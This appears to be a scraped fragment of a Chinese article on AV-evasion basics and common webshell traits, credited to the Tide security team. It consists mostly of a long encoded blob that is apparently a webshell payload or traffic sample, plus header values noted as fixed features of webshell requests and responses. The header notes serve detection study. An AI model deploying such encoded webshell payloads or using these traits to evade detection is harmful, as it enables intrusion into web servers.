QRNDFkUQEF0VTBFfFRBdX0MIbjxFEEIYHFwPQlBJPz5BE0MWRRBCGBNcF0RHXBIWB1IKWkcLbzJBGUMRSD84SWw5BUMLUxZRDldDX1BFdl0TG0pNaDpCGEEZR1VcQA9TBEdLFAFZEHYAVAYTHAk%2FPkETQxYMVkIQIVQIVVxAGhAFWhEaVQdVD01NEURQGxMJXFUCWhZVS0NsM0MRFRISFEETEVMRRRBWQRsMWhcJPz5BE0MWGFUOSwRCbjsVEhIUQRNDFhdVFk0TV0MTU1NbWEMIbjxFEEIYHDRpTDg4VEEPUBdfCl5CVgROJVhZVxodGj5pFkUQQhwHUA9Ue1NfUVxUBkJNEgRRDVwtUFhXEB1aPmkWRRBCUQcZS3FTW15RPkMWQjpTDVYVXA1FRhoWUghfBngEXQcUQxtKEAgPVFUNQAYfHj1oGEEZQxEVEhJGBEcWRAsQQFcKG1g8PxISFEFOBloWVRk1axlDERUSEhRBQQZCEEIMGENfAlhZEAk5axNDFkVNbzIcNGk8P1RHWgJHClkLEARND1oXWFpcbVEZWhBCFnUaEEVfFl9WRltbD30CWwAZGTVrGUMRFRZWCQRLE1oKVAcQQxVBHXVbXF0%2BVAZCTRIGURJYAV1QbVRBD1AXXwpeERpIEFg8PxISFEFaBR4AXRJMGBFHVRwbSTlrE0MWRRBCGEEdBwxUQEBVGBtKDWg6QhhBGR5UWUFXT2w5QxZFEEIYQRlHVQhTQEYASjxbBEBKHxVLClwSHlNGE1IaaQhREhBGShdDQV1eWxZWERFJFAYRSAJuOxUSEhQcPmkWRRBCSgRNFkNbGlRBD1AXXwpePV0ZUBBFRhoWUhRdAEIMXwx2AFQGGBMUW0c%2BUAJaCVEAVAQRR1dAXFFACFwNeARdBxFHH0JYW21TRhNSGh5BVhdWAk0KXlt8U1kEH0dSTBlZNWtEbjs4OFRBD1AXXwpeQl0ZXAByWl9fVQ9XSx8ePWgYQRlDcVpQbUcVUhFCTRlZNWsZQxEVFlFZBX8KWAANBV0VEUFSWFZ%2BXQ9WQR9ePWgYQRlDFVEPbWsnei9zOm9ZNWsZQxEVFlFZBX8KWAANEU0DShdDHRZWGFEfUh9YDUAXQwZBHFYSbhYaFwBbAXwLVgREPxMXCBAbAhM%2FFB4UAVUFdQpfUE9uFkMIbjxFEEIYCF9LQkBQQUATG0dSSQBOCUgEXhMaEBtPbDlDFkUQQhhBGSNBQEZXWhcbQWYkZCoFQxcEVEFXXEJJETN3MXhAEU8bWR5AQUAbDVwAVwkfEVoIV1keQEFAGw1cAFcJHwBRDwNMREZAHUcDWg0MSkURSk5bCl8PHUFWCF1ZGQdZDBpIAm47FRISFBxWD0UAS28yQRlDERUSEhQhQxZCAF4UEENpImV9DxAaBlYXUwtGShoxeDd5FxscFlpwWRkyWQxcDk4QHkZLQUAEXlAEXnNYFzZQDVVaRUEbMkoQYSpnVAxaelkeYltcUA5EEA0mCk1vCFcHXkJBHWcYQBdTCANQFzZQDVVaRUFkDkQGRDZYB1QNFhUAGwIdD0MaWDtvEEIYQURuOxUSEhRFVhtTBkUWXSdQD1QIQUdWEkcRHkFUTghNCEoMCBAdFl4REF5HCkBbDF1BCjg4Pz5BE0MWQVMPXC1QDVQIEEkQBEsGVRBEB34IVQZMFUkWVwxXL18LVR8aWjRpERUSEhACXgd6DF4HBUVaDlV5W1xRTxFDBFsWUxpaNGkRFRISEBNWFwtVC28ybDNDERUSW1JBG0JQEF4BTAhWDW5QSltHFUBLFBdFDEsJXA9dRlpdVwoRSh8ePWgYQRlDERUSElIUXQBCDF8MGBNMDUJdV15YElsMVQ4YRlxNGUdSHBJJOWsTQxZFEEIYQRlDERVbVBRJQBZUFkQQEEVdTxEFHhIFSBNeC0USTRpBH0URU0dcVxVaDFg6VRpREk0QdE0aFUQURwZYExdLGEcfQxlTR1xXFVoMWDpVGlESTRB0TRoVURNBDEQ6XA1fRhBDTUkSVEEPUBdfCl49XRlQEEVGd0ocRl4CXwkXSxFIGRg8PxISFEETQxZFEEIYQRlDERVbVBRJQBdEFkQQEBNcAlVZW1xfSRFMVAxeTUsJG0odFRBQVRJbQR9FEV8YJ3gvYnAbEk9sOUMWRRBCGEEZQxEVEhIUQRNDFkUQRkwMSUMMFUZXWRFdAltNQxtLPl4GRWpGV1kRbAdfFxhLFEEeAkISGwk5axNDFkUQQhhBGUMRFRISFEETQxZFQBdMBFcVGRdiemQ%2Bfyx6WBhLGBoZGwoVTwkURVBDCEFED0hBC10XBBAbD2w5QxZFEEIYQRlDERUSEhRBE0MWRRALXkERBURbUUZdDl08Ux1ZEUwSfBsZEldARg5BPFoKV0URSBkYPD8SEhRBE0MWRRBCGEEZQxEVEhIUQRNDFkVVEEoOSzxdWlUaFgARTxZUGVk1axlDERUSEhRBE0MWRRBCGEEZQxEVTxJRDUAGFh49aBhBGUMRFRISFEETQxZFEEIYQRlDERUSElkAWg8eR1EiCVMOTQEbAhwFQx9DFEccQhpDFUMTGFBEFkgIbjxFEEIYQRlDERUSEhRBE0MWRRBCGBw0aREVEhIUQRNDFkUQQhhBGUNMFVdeRwQTGDtvEEIYQRlDERUSEhRBE0MWRRBCGEFLBkVAQFwUJ1IPRQALbzJBGUMRFRISFEETQxZFEEIYHDRpERUSEhRBE0MWRRBCGEEZQxVaR0ZEFEdDC0VwBFENXDxWUEZtVw5dF1MLRBEQRU0OQRwJPz5BE0MWRRBCGEEZQxEVEhIUIUYNWgxeCRBFTQ5BHAk%2FPkETQxZFEEIYQRlDERUSEhQIVUMeQV8XTBFMFxEUDxIWQxpDTWg6QhhBGUMRFRISFEETQxZFEEIYQRkTQ1xcRhxFXBZCFUUWEVo0aREVEhIUQRNDFkUQQhhBGUMRFRISRgRHFkQLEDZKFFxYPD8SEhRBE0MWRRBCGEEZQxEVTz8%2BQRNDFkUQQhhBGUMRSD84FEETQxZFEEIYQRlDQ1BGR0YPEyVXCUMHA2wzQxEVEhIUQRMeDWg6QhhBGR48Pz84FEETQ18DGARND1oXWFpcbVEZWhBCFnUaEEZKGkJBV18TSBoYO28QQhhBGUMRFXJBTRJHBltNFAFVBXUKX1AeFkYER0oNaDpCGEEZHlRZQVddBxsFQwtTFlEOVzxUTVtBQBJ2Gx5CQANLEk0LQ0AVGx0aPmkWRRBCGEEZQ3FFU0FHFVsRQ00UAVUFdQpfUB4WRgRHSg1oOkIYQRkeVFlBV10HGwVDC1MWUQ5XPFRNW0FAEnYbHkJDCl0NVTxUTVdRE0gaGDtvEEIYQRlDERVCQF0PR0t2FlgHVA1mBklQURoQAl4HegxeBxFIAm47FRISFBxWD0UAWQQQB0wNUkFbXVo%2BVhtfFkQRfRkRRFRNV1ETSBoYO28QQhhBGUMRFXJXTARQSxIGXQZ0CFcGHRFdHhATVhcfXj1oGEEZQxEVEhJEE1oNQk1aDVEPEUFtWxAeEA4aSg1oOkIYQRkeVFlBV10HGwVDC1MWUQ5XPFRNW0FAEnYbHkJADUgEV0QYHEk%2FPkETQxZFEEIYRV8TDHVCXUQEXUsSBl0GdAhXBh0SQBUdWj5pFkUQQhhBGUNGXVteUUkSI1AAXwQQRV8TGBxJPz5BE0MWRRBCGEEZQxFFQFtaFRsjUAJVFktJHQVBGQACAFkaSg1oOkIYQRlDERUSTzlrE0MWRRBCGEF5E1JZXUFRSRcFRkwLbzJBGUMRSFdeRwRaBR4DRQxbFVAMX2pXSl0SRxBzHRhFSBNWAG5aQldaRhpKTWg6QhhBGUMRFRIWREEOQ3YVQg1bPlYTVFsaFlcMVy9fC1VOGABLEVBMGgMUXA1DVxdCA0FJHhNYRVcVGEEUFBFMHEIKQQRdEVRAQFUYG0RGDEAHH00ZREYSGxsYQRcKWUwLbzJBGUMRFRISFBZbCloAGEN4B1wMVx0WW1s6Aj4fTEtvMkEZQxEVEhIUQRNDFhVCC1YVESNXUldGR0kXClk%2BAT8UUwlXCRwbCTlrE0MWRRBCGEFEbjsVEhIUQRNDFhJYC1QEEUJxU1ddUkkXClk%2BAj8RSEJuOxUSEhRBE0MWRRBCGBFLCl9BGnJSBlYXRU0UC1c6Cz4dBwIGDEgaWDtvEEIYQRlDERVPPz5BE0MWRRBCGCFfAF1aQVccRVoMbVRtSwNsM0MRFRISFEETI1AGXA1LBBFHWFppAGlICG48RRBCGEEZQxF1QkBbAmwAWgpDBxBFSUoKODgSFEETHlMJQwdRBxERRFtBWlENXxBeClMJEEVdTxERUV9QLVoNU0wZQkNsM0MRFRISFEETE0QMXhYQRUsGRRwJPz5BE0MWGFUOSwRQBRlGR1BHFUFLEgEcUhRQEEIMFx0QFEcVQ3YGXANLEmYGSVxBRkdJESB5KBJLERo0aREVEhIUQRNDEhINDF0WGSB%2BeBoVYzJQEV8VRExLCVwPXRIbCTlrE0MWRRBCGEEdBgwRRR8KBEsGVU0UAVUFdQpfUBsJOWsTQxZFEEIYQR0QXggWVxlfYBdSKkUWEEgCbjsVEhIUQRNDFhVCC1YVEUdCWh8MZgRSB3cJXEoRSAJuOxUSEhRBE0MWQUMHBUVcTg9mRlZxE0FLH149aBhBGUMRFRISRBNaDUJNFBFdTAcxVFRWc1gNG0ofXj1oGEEZQ0xQXkFRGj5pFkUQQhhBGUNDUEZHRg8TQVgKXgcYDl9DQUddUWsOQwZYSkADSxJNC0NAHUFcBF8PaQBIB1tOXBtUVh1XTARQTEYKQAdWTnosfBpAR1oSWwZaCUMKVwJSQ1hGElNCAFoPVwdcBxpaNGkRFRISSWw5QxZFEBJKCFcXGR0WQFEVEl4GTA9ASgRNXkoRQFdAHBFZFEcZWTVrGUMRFRZAURJGD0JFDUJ4Dls8VlBGbVcOXRdTC0QREEgCbjsVEhIUIVwBaQBeBmcCVQZQWxobD2w5QxZFEBBdFUwRXxUWQFESRg9CXj1oRWwzBURbUUZdDl1DUx1VAWsQVUsYTj84FEETQxIBUjZBEVxeVlBGGhYFUTdPFVVAEVo0aREVEhIQBVErWRZEX18ETUsTUVB6WxJHQR9ePWgYQRlDFVFQYlsTR15RAERKGgVbM15HRhAdWj5pFkUQQhwUSgZDW1NfUVxUBkJNEgZaNEoGQ1tTX1FDGlg7bxBCGEEdE1BGQUVbE1deUQBEShoFWzNQRkFFWxNXQR9ePWgYQRlDFVBKV1c1ShNTWFcHTEkbBklQUWZNEVZBH149aBhBGUMVUEpXVzJCDwsCVRYQQ1wbVFZhQ1hDGlg7bxBCGEFfFl9WRltbDxNDWxxDE1Q%2BXBtUVhoWXA5AFxpBQA1KFRVHREZXQFoAXgYaQUADSxJODENRHhZRGVYAYhxABxRFShJdHEk%2FPkETQxZFEEIYThZD1L2p14%2Fb29yog77HNWsZQxEVEhIUQRcAWQteQgVBVwZGFV9LRxBfCh5BWA1LFRVHREZXQFoAXgYaQUADSxJODENRHhAWTRcTWRdESwNsM0MRFRISFEETTBlFcwpdAlJDUlpcXFECRwpZCz1oGEEZQxEVEhJdBxNLEgZfDFZMBwBeW1xXVxVsBkQXXxARQUJuOxUSEhRBE0MWRRBCGBNcF0RHXBIQAlwNWEgOAVcPVwZSQW1XRhNcEQ1oOkIYQRlDERUSTzlrPmkWRRBCGEEZQxVHV0FBDUdDC0UUAVcPV04PREdXRhgbR0UUXEsDbDNDERUSEhRBEwpQRRhGWw5XDRwLV0BGDkFKTWg6QhhBGUMRFRISFEETEVMRRRBWQR0AXltcHwoEQRFZFwtvMkEZQxEVEhIUHD5pFkUQQhhBGUMVR1dBQQ1HQwtFFAFXD1dOD0RHV0YYG0dFFFxLA2wzQxEVEhIUQRMKUEUYRl0ZXABlTEJXCVwRFkYBURZdQxAYPD8SEhRBE0MWRRBCGEFLBkVAQFwUQ2IWUxdJQncqFUMTHhZRWw9dTggEVgRdAk0GVWpAXUMSGEEWF18VS0FYBVdQUUZRBRFYO28QQhhBGUMRFU9XWBJWGDtvEEIYQRlDERUSEhRBFwdXEVFfGg5SP18XCT8%2BQRNDFkUQQhhBGUMRQlpbWAQTSxIGXw5NDFdDDBUWQFESRg9CSA4EXRVaC25TW1dYBRtKHx49aBhBGUMRFRISFEETQxZFEEIcBVgXUBsPUFUSVlUCOlUMWw5dBhkRUV1YFF4NG1teA1UEEE0TaUYQD2w5QxZFEEIYQRlDERUSTzlrE0MWRRBCGEEZQxEVFlZVFVJNC0dsDBpaNGkRFRISFEETQxZFEEJRBxlLFUdXQUENR04IC0UPZxNWFEIVDBIESBMYO28QQhhBGUMRFRISFEETQxZFH00YiYfw1LKI1KHR1e6YaDpCGEEZQxEVEhIUQRNDFkUQFVAIVQYZEUBdQ0EOQxIXVRFNDU1OD1NXRlcJbAJFFl8BEEgQQ0o4OBIUQRNDFkUQQhhBGUMRFRISFEETBVkXVQNbCRlLFUddRRQAQEMSE1EOTQQQGDw%2FEhIUQRNDFkUQQhhBGUMRFRISFEETQxZFFAZZFVhNDFdTQVFXBzxTC1MNXAQRR0dUXkdRSB1BahESWTVrGUMRFRISFEETQxZFEEIYQRlDERVPPz5BE0MWRRBCGEEZQxEVEhIUQRNDFkFUA0wAF14TaVwQD2w5QxZFEEIYQRlDERUSEhRBEx47bxBCGEEZQxEVEhIUQU5uPEUQQhhBGUMRFRISFBNWF0MXXkIcBVgXUA4%2FOBRBE0MWRRBCRWwzQxEVEk85axNDFkVWF1YCTQpeWxJCUA52G1MGGEZcAE0CU1RBV2AYQwYaQVgNSxUVR0FaQEYYRUYQUxdeA1UEFUdBVEFBQw5BBxpBVRpdAm0aQVAeFkcQX0pNaDpCGEEZQxEVEkZGGBMYO28QQhhBGUMRFRISFEEXAFkLXkIFQVcGRhVidntJERgSAVEWWQNYEFRhS0JRHAkLWRZEXxwJVhBFDkJdRhUOGBIVXxBMHAJBHRUWR0cEQQ1XCFVOGEVJAkJGRV1GBRpYO289aBhBGUMRFRISFEETQxlKEIqW397enxVidntB2vevjZ%2FN3smYho261oqOhI%2Fh092IbzJBGUMRFRISFEETQxZBUw1WDxRdQlBGc0AVQQpUEEQHEDF9LAsPc2ZgM2wmZDd9LXwkFUNhcX0IDiRhMXsqdCdnJGEgdGVme3svGlg7bz1oGEEZQxEVEhIUQRNDXwMQShwEQQZSYUtCUVwOQUMVVANMBBtKSjg4EhRBE0MWRRBCGEEZQxEVEkBRFUYRWEUSM00ESxoRenkeFEMYR1UKXgwVX1wbVFYaFkcQX0odRxAQVxZKQ1BTVFdXFVYHFF49aBhBGUMRFRISFEETQ0sAXBFdGjRpERUSEhRBE0MWRRBCGEEZQxVRU0ZVXBEMXTleQANsM0MRFRISFEETQxZFEEIYQRlHQkFfDxACXA1YSA4SSgRJAkNQGhZHEF9KDWg6QhhBGUMRFRISFEETQxZFEEZLFVROD1BKV1cURwYeTAtvMkEZQxEVEhIUQRNDFkUQQhhFSwxGCBZBQAweXVAARAFQSWknfg8IdHE1cCtpJGMxdyIQWDw%2FEhIUQRNDFkUQQhhBGUMRFRZtRg5EXhQ5XkADbDNDERUSEhRBE0MWRRBCGEEZBV5HV1NXCRNLVxdCA0E%2BUgZIRhoWRg5EShYEQ0IcClwaGE4%2FOBRBE0MWRRBCGEEZQxEVEhIUQRNDEgFRFllPBAFQRlcEAD5WDVUKVAcQRVIGSBwcEGgVEVg7bxBCGEEZQxEVEhIUQRNDFkUQQhhBHTxDWkUcCQNSEFNTBD1dD1oMVVAaFkYORDgSDlUbZUgXQW1BEAk5axNDFkUQQhhBGUMRFRISFEFObjxFEEIYQRlDERUSEhRBE0MWQVQDTAAXXhVqQF1DTxE%2FWEcLbzJBGUMRFRISFEETQxZFEEIYFlEKXVASGhATXBQLQUMWVUwHBVRBUVocMXcsDF92J2wicTxwZmF9d0gaGDtvEEIYQRlDERUSEhRBE0MWRRBCGEFfDENQU1FcQRsCRBdRG2cKXBpCHRZAWxYaQ1cWEEZTBEBKSjg4EhRBE0MWRRBCGEEZQxEVEhIUQRNDFkUQRlwATQIfCFBTRwQFV2kAXgFXBVxLFUddRW9FWAZPOBlMGj1NQQo4OBIUQRNDFkUQQhhBGUMRFRISFEETHjtvEEIYQRlDERUSEhRBE0MWRRBCGEEdB1BBUxwJQ28NFF49aBhBGUMRFRISFEETQxZFEEJFbDNDERUSEhRBE0MWRRBCGEEZEVRBR0BaQRcHVxFRWTVrGUMRFRISFEETQxZFTW8ybDNDERUSEhRBEx47bxBCGEEZQxEVUVNAAltLZiF%2FJ0ACXBNFXF1cFEVWSjtvEEIYQRlDERVJPz5BE0MWRRBCGEEZQxFHV0ZBE11DEgAdXF8ETS5URkFTUwQbSg1oOkIYQRlDERUSTzlrE0MWRU1vMkEZQxFcVBIcRVcBYhxABwVcGw5IRkNeFkhIbjxFEEIYQRlDEVxUEhwESxdTC0MLVw9mD15UVldQSREOTxZBDlFDEEpKODgSFEETQxZFEEIYQRkRVEFHQFpBXhpFFFw9XRlcABkRVlB8DkAXGkFUAGgOSxcdEUdBURNdAlsAHEZIAEoQRlpAVhhFVhtTBmQbSAQVR1RNV1FnEF9KDWg6QhhBGUMRFRJPUQ1ABhYMVkIQBEEXVFtBW1sPbA9ZBFQHXEkbE1VaEBsdGj5pFkUQQhhBGUMRFRISRgRHFkQLEBJcDnwbVFYaFlADZxpGABxGXANxDEJBHhZQA2MMRBEcRk0SXBFfVF9XGEVDAkUWRw1KBRVHVE1XUWAYQwYaQVUaXQJqEl0cCT8%2BQRNDFkUQQhgcXA9CUEk%2FPkETQxZFEEIYQRlDEUdXRkETXUMUC19CXRlNBl9GW11aQwhuPEUQQhhBGUMRSD84FEETQ0sAXBFdQVAFER1XSkAEXRBfCl49VA5YB1RRGhBEBVxBH0xLbzJBGUMRFRISFBNWF0MXXkJIBVYmSVBRGhAFUTdPFVVOHAVbK15GRh4QBVEzWRdEThwUSgZDW1NfUU0XE1cWQxVXE11PFVBKV1c1ShNTSRQHQARaMEBZGwk5axNDFkVNB1QSXBg8PxISFEETQxZFQgdMFEsNERdcXRQESxdTC0MLVw8bWDw%2FEhIUQU5uPEUQQhgTXBdER1wSFg9cQ1MdRAdWElAMXxcJPz5sOR47b1YXVgJNCl5bElBVElZVAiBeAVcFXEsVUVNGVUhIbjxFEEIYE1wXREdcElYAQAYAUW8HVgJWB1QdFlZVFVJKDWg6HzVrXxZfVkZbWw8TF1MWREoRGjRpERUSEkYERxZECxBAVwobWDw%2FTz8%2BB0YNVRFZDVZBXgZFHRZZURgaGDtvEEIYQV4PXldTXhRFQwJEBF0HTARLEAo4OBIUQRMKUEUYC0sSXBcZEUJTRgBeBkIAQhFjRVIGSGgbG09sOUMWRRBCGEEZEVRBR0BaQRcTVxdRD10VXBFCbhZZURhuWDtvEEIYQUQGXUZXSTlrE0MWRRBCGEFLBkVAQFwUD0YPWl49aBhBGUNMODhPOWtVFlgGRAtXDxkEVEFzXlgxUhFXCFUWXRNKSxhOPzgUQRNDUQlfAFkNGUdBVEBTWQRHBkQWC28yQRlDEUdXRkETXUMSFVEQWQxcF1RHQQk5a05uPANFDFsVUAxfFVtcVw1GB1MmXwZdSRAYPD8SEhRBFwBaBEMRew5dBgxSV0YcQ1EKWCZfBl1DEFg8PxISFEEXAFkBVSxZDFxeVlBGGhYCXAdTK1EPXUMQWDw%2FEhIUQRc8ZSBjXx4GXBdiUEFBXQ5dSx9ePWgYQRlDFWphd2c6FwBZAVUsWQxcPgwRUV5VEkAgWQFVWTVrGUMRFUBXQBRBDRZHXwkaWjRpTDg4VEEPUBdfCl5CWgBKBgcBdldXDlcGHkFDFkoIVwQYTj84FEETQ0QARBdKDxkBUEZXBAA%2BVwZVClQHEEVKF0NcXFUdWj5pS2g6BE0PWhdYWlwSVw5dFVMXRCRRDVwzVEdfW0cSWgxYFhhGXghVBnBBRkAdGj5pFkUQQhwMVgcMBQk%2FPkETQxYMVkIQEk0RQVpBGhAHWg9TJEQWSk0eMRYcEw8JB1IPRQAZGTVrGUMRFRISFEEXDlkBDUZVDl1IAQEGBg9sOUMWRRAfNWsZQxEVW1QUSUAXRBVfERBFXwpdUHNGQBMfRGFCGUMFXF8CXUZXG09sOUMWRRBCGEEZR1xaVg8QDFwHHVUCUApaNGkRFRISSWw5QxZFEAteQREQRUdCXUdJFwVfCVUjTBVLTxZtFRsVXA4FVwlDBxEaNGkRFRISFEETQxIIXwYFRVQMVR4CAwVQCG48RRBCGBw0aREVEhJGBEcWRAsQRlUOXVg8P08%2FPgdGDVURWQ1WQVoPXkZXGh0aPmkWRRBCeBJcEEJcXVxrEkcCRBEYSwNsM0MRFRIWazJ2MAtDVwdMMlwQQlxdXBxICG48RRBCGEVmMHRmD1xBDV9YO28QQhhBUAURHXJBURJAClkLbwZdEk0RXkwaGx0aPmkWRRBCGEEZQ0NQRkdGDxNBWQ4SWTVrGUMRFU9XWBJWGDtvEEIYQRlDERVAV0AUQQ0WR1YDUQ0YQQo4OBIUQRMeO29NbzJsMwVEW1FGXQ5dQ1QMVyRRDVwnXkJcXlsAV0sfHj1oGEEZQxVYXVZRXFQGQk0SD1cFXEEYDj84FEETQxIDWQ5dL1gOVAhVV0BJEQVfCVUsWQxcQRgOPzgUQRNDEhdVA1wjQBdUe0dfCQZWFx5HQgdZBXsaRVB8R1lDGlg7bxBCGEEdE15GW0ZdDl1eUQBEShoRVhBYQVtdWkMaWDtvEEIYQVAFER0WX1sFVl4LR1YLVARqCktQEBtPbDlDFkUQQhhBGQpXFRpyXRJsEVMEVANaDVxLFVNbXlEvUg5TTBkZNWsZQxEVEhIUQRNDFkVCB0wUSw0RdVRbWARACkwAGEZeCFUGf1RfVx1PEUENaDpCGEEZQxEVEk9RDUAGTWg6QhhBGUMRFRISFEETEVMRRRBWQRsNXkESQFEAV0ENaDpCGEEZQxEVEk85axNDFkVNB1QSXApXFRoWWQ5XBgtYEhBdAF1BGE4%2FODlrE0MWRRBCGEFQBREdVEdaAkcKWQtvB0AIShdCcEoaFgdcE1MLEkseR18WX1ZGW1sPbAZODEMWSyRBSxNTQFdVBRFKEENWF1YCTQpeW21XTAhAF0UgSEoaB0oGVF4QGx0aPmkWRRBCGEEZQxEVEhIQCVINUglVX14OSQZfHRZUXQ1WLVcIVU4aAFtIExwJPz5BE0MWRRBCGEEZQxFTQVdRChtHXgReBlQEFUdBWkFbQAhcDR9ePWgYQRlDERUSEhRBE0MSAVEWWVxfEVRUVhoQCVINUglVThwTXAJVd0tGUS9GDh9ePWgYQRlDERUSEhRBE0N2A1MOVxJcSxVdU1xQDVZKDWg6QhhBGUMRFRISFEETClBFGEZcAE0CEAgPVFUNQAYfHj1oGEEZQxEVEhIUQRNDFkUQQkoETRZDWxIWUABHAg1oOkIYQRlDERUSEhRBEx5TCUMHQ2wzQxEVEhIUQRNDFkUQQhhBGRFUQUdAWkERAFcLXg1MQUsGUFESVF0NVkENaDpCGEEZQxEVEhIUQRMeO28QQhhBGUMRFU9XWBJWQ18DEEpeFFcARVxdXGsESwpFEUMnQEkbBVhZV21TBEc8VQpeFl0PTRATHBtJOWsTQxZFEEIYQRlDERVAV0AUQQ0WA1kOXT5eBkVqUV1aFVYNQhYYRl4IVQZ%2FVF9XGAdSD0UAHAxNDVVPFUVdQV0VWgxYSRQQXQBdIUhBV3xBDBpYO28QQhhBGUMRFU9XWBJWGDtvEEIYQRlDERUSEhRBQQZCEEIMGENXDBFTR1xXFVoMWEcLbzJBGUMRFRISFBw%2BaTtvEEIYQUQGXUZXSTlrE0MWRRBCGEFLBkVAQFwUQ10MFghfBl1DAm47FRISFBw%2BaUtoOm8yB0wNUkFbXVpBUQpRI1kOXTRJD15UVhodGj5pFkUQQhwHUA9Ue1NfUVxUBkJNEgRRDVwtUFhXEB1aPmkWRRBCHAdQD1R2XVxABF0XRVhXB0xJGwVYWVdxWw9HBlgRQ0ARWjRpERUSEhARXBBfEVkNVlxeBkUdEEJbEloXXwpeQBFaNGkRFRISXQcbBUMLUxZRDlc8VE1bQUASdhseR1YNSARXQRgTFFRBD1AXXwpePV0ZUBBFRndKHENVFEQMRAcaSB9FV0BcUUAIXA1pAEgLSxVKJkkdEFRHBFYIFEwZGTVrGUMRFRISFEEXC1cLVA5dXF8MQVBcGhAHWg9TK1EPXU0bAlMeEBsPbDlDFkUQQhhBGQpXFRoWXABdB1oAEV8FB1gPQlAbSTlrE0MWRRBCGEEZQxEVVEFRBFhLEg1RDFwNXE8VRV1BXRVaDFhMC28yQRlDERUSEhRBE0MWQVwHVlxfFENcRlccRVsCWAFcBxRFXwpdUHFdWhVWDUIWGVk1axlDERUSEhRBE0MWRVkEGEkdD1RbEw8JB1IPRQAZGTVrGUMRFRISFEETQxZFEEIYQUsGRUBAXBRDXAgUXj1oGEEZQxEVEhIUQRNDSwBcEV0aNGkRFRISFEETQxZFEEIYQRlDQ1BGR0YPE0FVBF4MVxUZFENcRlcUB1oPU0cLbzJBGUMRFRISFEETQxYYPWgYQRlDERUSEhRBE0N2A1MOVxJcSxVdU1xQDVZKDWg6QhhBGUMRFRJPUQ1ABk1oOkIYQRlDERUSEhRBExFTEUUQVkEbAFBbXF1AQVwTUwsQBFENXEEKODgSFEETQxZFEB81axlDERVPV1gSVkNfAxBKXhRXAEVcXVxrBEsKRRFDJ0BJGwVYWVdtRBRHPFUKXhZdD00QExwbSTlrE0MWRRBCGEFQBREdVFtYBGwTQxFvAVcPTQZfQUEaEAdaD1MrUQ9dTR0FWFlXcVsPRwZYEUNOfih1Jm50YmJxL3dKF1gNBFkNSgYYTj84FEETQxZFEEIYQRlDQ1BGR0YPE0FZDhJZNWsZQxEVEhIUQU4GWhZVGTVrGUMRFRISFEETQxZFQgdMFEsNERdFQF0VVhEWA1ELVEMCbjsVEhIUQRNDFhg9aBhBGUNMUF5BURo%2BaRZFEEIYQRlDQ1BGR0YPE0FYChAETQ9aF1haXBAPbDlDFkUQHzVrRG47U0dcVxVaDFhFUwNWIlgPXXJIW0QkXQBZAVVKERo0aREVEhJdBxNLUBBeAUwIVg1uUEpbRxVAJk5NEgVCBFcAXlFXEB1ISG48RRBCGEEZQxFHV0ZBE11DFFQSWTVrGUMRFU9XWBJWGDtvEEIYQRlDERVAV0AUQQ0WRwBAA2wzQxEVEk85a05uPANFDFsVUAxfFVFTWiJSD1oiSgtIJVwAXlFXGh0aPmkWRRBCUQcZS1dAXFFACFwNaQBIC0sVSiZJHRBVTgVWAFkBVUARSEJuOxUSEhRBE0MWF1UWTRNXQxMEEAk5axNDFkVNB1QSXBg8PxISFEETQxZFQgdMFEsNERcCEA9sOUMWRRAfNWtEbjtTR1xXFVoMWEVSG0wESjdefFxGUQZWER5BUhtMBEpPERFCXUcIRwpZCxlCQ2wzQxEVEhZCAF9DC0UAWTVrGUMRFRZEVQ0TXhZBUhtMBEo4FUVdQV0VWgxYRRtCCzwZRREFSlRSWj5pFkUQQhwXWA8RCQ4PFFkIbjxFEEIYRU8CXRVODxRFURpCAEM5HBFWEFhBW11aQRhDBDgQRBhRQQVXDj84FEETQxITUQ4YXQVeEQ0JPz5BE0MWQUYDVEFFXhERUEtABEA4EhVfEVEVUAxfFRkSBTwTRRZVSAReWjRpERUSEhAXUg8WWQxfGFkCbjsVEhIURUUCWkVMXxhFWxpFUEFpEBFcEF8RWQ1WPBlFEQVKVFJaPmkWRRBCSgRNFkNbEhZCAF9YO29NbzIHTA1SQVtdWkFaEHEfWRJrFUsGUFgaFlYIXUpNaDpCGEEZClcVGkFAE18GWE0UAFEPEF0MBxtJOWsTQxZFEEIYQR0BWFsPQUEDQBdETRQAUQ8VUx0HGwk5axNDFkUQQhhBHRBFR3tcUg4TXhYlRQxIAFoIGRdxAFcJUhFFRxxCHANQDRgOPzgUQRNDFkUQQhwVQBNUdl1WUUEOQ18LRBRZDRFHQkFAe1oHXDgRBlgDShIIRGwbFkFAE3oNUAprRVsJWBFCBxVvHVo%2BaRZFEEIYQRlDQkJbRlcJE0sSEUkSXSJWB1QcEkk5axNDFkUQQhhBGUMRFVFTRwQTUAdUA1sCbDNDERUSEhRBE0MWRRBCGEEZEVRBR0BaQUcRQwALbzJBGUMRFRISFEETQxZFEEIYA0sGUF4JPz5BE0MWRRBCGEEZQxFRV1RVFF8XDGg6QhhBGUMRFRISFEETQxZFEBBdFUwRXxVUU1gSVlg7bxBCGEEZQxEVTz8%2BQRNDFhhVDksEQm47FRISFEETQxYXVRZNE1dDV1ReQVFaPmkWRRBCRWwzHjw%2FVEdaAkcKWQsQBV0VexpFUEEaEBJHEV8LV0sYGjRpERUSEhADShdTFhBfGABLEVBMGhsPbDlDFkUQBFcTEUdYFQ8SBFoTR19FDEJLFUsPVFsaFkcVQQpYAhlZGEVQSBocST8%2BQRNDFkUQQhgASxFQTG1CQRJbSxIHSRZdEhUMQ1EaFkcVQQpYAmtGUTwQSgo4OBIUQRMeO28QQhhBSwZFQEBcFEVRGkIAQ1k1a0RuOw%3D%3D

在所有请求中都包含

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


免杀基础-常见Webshell特征分析


所有响应中都包含

Cache-Control: no-store, no-cache, must-revalidate


免杀基础-常见Webshell特征分析



E

N

D





Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章370余篇,自研平台达到26个,目有15个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们



免杀基础-常见Webshell特征分析

原文始发于微信公众号(Tide安全团队):免杀基础-常见Webshell特征分析

